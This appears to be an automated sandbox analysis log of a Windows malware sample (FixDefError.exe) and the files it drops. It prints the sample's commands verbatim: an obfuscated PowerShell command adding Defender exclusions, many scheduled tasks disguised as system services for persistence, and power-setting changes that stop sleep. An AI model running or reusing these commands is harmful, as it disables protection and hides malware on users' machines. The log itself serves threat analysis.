Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F733B9 1_2_00F733B9
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F77958 1_2_00F77958
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F77D80 1_2_00F77D80
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Code function: 1_2_00F77FAE 1_2_00F77FAE
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02400B00 56_2_02400B00
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02406CAC 56_2_02406CAC
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02407670 56_2_02407670
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02401EC8 56_2_02401EC8
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02402860 56_2_02402860
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_024033A0 56_2_024033A0
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02407660 56_2_02407660
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02407669 56_2_02407669
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02403528 56_2_02403528
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02403538 56_2_02403538
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Code function: 56_2_02401E5E 56_2_02401E5E
Sample file is different than original file name gathered from version info
Source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImpulse.exe> vs FixDefError.exe
Source: FixDefError.exe, 00000000.00000000.245216110.0000000000562000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
Source: FixDefError.exe, 00000000.00000002.272580789.0000000000B39000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FixDefError.exe
Source: FixDefError.exe Binary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Creates driver files
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys Jump to behavior
PE file contains more sections than normal
Source: svhost.exe.1.dr Static PE information: Number of sections : 11 > 10
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
Source: ProgramStarter.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FixDefError.exe ReversingLabs: Detection: 25%
Source: FixDefError.exe Virustotal: Detection: 39%
Source: FixDefError.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FixDefError.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FixDefError.exe C:\Users\user\Desktop\FixDefError.exe
Source: C:\Users\user\Desktop\FixDefError.exe Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown Process created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe C:\ProgramData\RuntimeBrokerData\RegSvc.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\powercfg.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FixDefError.exe Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
